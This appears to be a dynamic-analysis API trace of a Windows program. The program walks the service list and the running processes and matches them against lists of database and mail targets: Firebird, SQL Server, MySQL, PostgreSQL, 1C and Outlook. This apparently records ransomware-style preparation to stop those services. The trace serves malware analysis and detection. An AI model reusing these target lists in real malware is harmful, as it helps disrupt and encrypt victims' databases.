	[0161.753] CloseServiceHandle (hSCObject=0xb616c60) returned 1
	[0161.753] lstrlenW (lpString="Appinfo") returned 7
	[0161.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0161.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0161.754] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0161.754] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0161.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0161.754] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0161.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0161.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0161.754] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0161.754] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0161.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0161.754] lstrlenW (lpString="AudioSrv") returned 8
	[0161.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0161.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0161.754] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0161.754] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0161.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0161.754] lstrlenW (lpString="BFE") returned 3
	[0161.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0161.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0161.754] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0161.754] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0161.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0161.754] lstrlenW (lpString="CryptSvc") returned 8
	[0161.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0161.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0161.754] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0161.754] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0161.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0161.754] lstrlenW (lpString="CscService") returned 10
	[0161.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0161.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0161.755] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0161.755] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0161.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0161.755] lstrlenW (lpString="DcomLaunch") returned 10
	[0161.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0161.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0161.755] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0161.755] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0161.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0161.755] lstrlenW (lpString="Dhcp") returned 4
	[0161.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0161.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0161.755] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0161.755] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0161.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0161.755] lstrlenW (lpString="Dnscache") returned 8
	[0161.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0161.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0161.755] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0161.755] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0161.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0161.755] lstrlenW (lpString="DPS") returned 3
	[0161.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0161.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0161.755] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0161.755] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0161.755] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0161.755] lstrlenW (lpString="eventlog") returned 8
	[0161.755] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0161.755] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0161.755] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0161.756] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0161.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0161.756] lstrlenW (lpString="EventSystem") returned 11
	[0161.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0161.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0161.756] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0161.756] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0161.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0161.756] lstrlenW (lpString="gpsvc") returned 5
	[0161.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0161.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0161.756] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0161.756] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0161.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0161.756] lstrlenW (lpString="iphlpsvc") returned 8
	[0161.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0161.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0161.756] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0161.756] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0161.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0161.756] lstrlenW (lpString="LanmanServer") returned 12
	[0161.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0161.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0161.756] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0161.756] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0161.756] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0161.756] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0161.756] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0161.756] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0161.756] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0161.756] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0161.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0161.757] lstrlenW (lpString="lmhosts") returned 7
	[0161.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0161.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0161.757] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0161.757] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0161.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0161.757] lstrlenW (lpString="MMCSS") returned 5
	[0161.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0161.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0161.757] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0161.757] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0161.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0161.757] lstrlenW (lpString="MpsSvc") returned 6
	[0161.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0161.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0161.757] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0161.757] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0161.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0161.757] lstrlenW (lpString="Netman") returned 6
	[0161.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0161.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0161.757] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0161.757] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0161.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0161.757] lstrlenW (lpString="netprofm") returned 8
	[0161.757] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0161.757] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0161.757] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0161.757] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0161.757] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0161.758] lstrlenW (lpString="NlaSvc") returned 6
	[0161.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0161.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0161.758] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0161.758] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0161.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0161.758] lstrlenW (lpString="nsi") returned 3
	[0161.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0161.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0161.758] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0161.758] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0161.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0161.758] lstrlenW (lpString="PcaSvc") returned 6
	[0161.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0161.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0161.758] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0161.758] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0161.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0161.758] lstrlenW (lpString="PlugPlay") returned 8
	[0161.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0161.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0161.758] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0161.758] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0161.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0161.758] lstrlenW (lpString="Power") returned 5
	[0161.758] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0161.758] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0161.758] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0161.758] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0161.758] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0161.758] lstrlenW (lpString="ProfSvc") returned 7
	[0161.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0161.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0161.759] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0161.759] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0161.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0161.759] lstrlenW (lpString="RpcEptMapper") returned 12
	[0161.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0161.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0161.759] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0161.759] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0161.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0161.759] lstrlenW (lpString="RpcSs") returned 5
	[0161.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0161.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0161.759] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0161.759] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0161.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0161.759] lstrlenW (lpString="SamSs") returned 5
	[0161.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0161.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0161.759] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0161.759] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0161.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0161.759] lstrlenW (lpString="Schedule") returned 8
	[0161.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0161.759] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0161.759] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0161.759] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0161.759] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0161.759] lstrlenW (lpString="SENS") returned 4
	[0161.759] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0161.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0161.760] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0161.760] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0161.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0161.760] lstrlenW (lpString="ShellHWDetection") returned 16
	[0161.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0161.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0161.760] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0161.760] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0161.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0161.760] lstrlenW (lpString="Spooler") returned 7
	[0161.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0161.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0161.760] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0161.760] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0161.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0161.760] lstrlenW (lpString="SysMain") returned 7
	[0161.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0161.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0161.760] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0161.760] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0161.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0161.760] lstrlenW (lpString="Themes") returned 6
	[0161.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0161.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0161.760] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0161.760] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0161.760] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0161.760] lstrlenW (lpString="TrkWks") returned 6
	[0161.760] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0161.760] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0161.760] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0161.761] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0161.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0161.761] lstrlenW (lpString="UxSms") returned 5
	[0161.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0161.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0161.761] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0161.761] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0161.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0161.761] lstrlenW (lpString="WdiServiceHost") returned 14
	[0161.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0161.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0161.761] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0161.761] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0161.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0161.761] lstrlenW (lpString="WdiSystemHost") returned 13
	[0161.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0161.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0161.761] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0161.761] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0161.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0161.761] lstrlenW (lpString="Winmgmt") returned 7
	[0161.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0161.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0161.761] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0161.761] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0161.761] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0161.761] lstrlenW (lpString="WPDBusEnum") returned 10
	[0161.761] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0161.761] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0161.761] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0161.762] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0161.762] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0161.762] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7ba6360 | out: hHeap=0x7ab0000) returned 1
	[0161.762] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x37c
	[0161.764] Process32FirstW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0161.764] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0161.764] lstrlenW (lpString="System") returned 6
	[0161.764] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0161.764] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0161.764] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0161.764] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0161.764] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0161.764] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0161.764] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0161.764] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0161.765] lstrlenW (lpString="smss.exe") returned 8
	[0161.765] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0161.765] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0161.765] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0161.765] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0161.765] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0161.765] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0161.765] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0161.765] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0161.765] lstrlenW (lpString="csrss.exe") returned 9
	[0161.765] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0161.765] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0161.765] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0161.765] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0161.765] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0161.765] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0161.765] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0161.766] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0161.766] lstrlenW (lpString="wininit.exe") returned 11
	[0161.766] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0161.766] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0161.766] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0161.766] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0161.766] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0161.766] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0161.766] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0161.766] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0161.766] lstrlenW (lpString="csrss.exe") returned 9
	[0161.766] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0161.766] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0161.766] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0161.766] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0161.766] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0161.767] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0161.767] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0161.767] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0161.767] lstrlenW (lpString="winlogon.exe") returned 12
	[0161.767] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0161.767] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0161.767] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0161.767] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0161.767] Process32NextW (in: hSnapshot=0x37c, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0161.767] lstrlenW (lpString="services.exe") returned 12
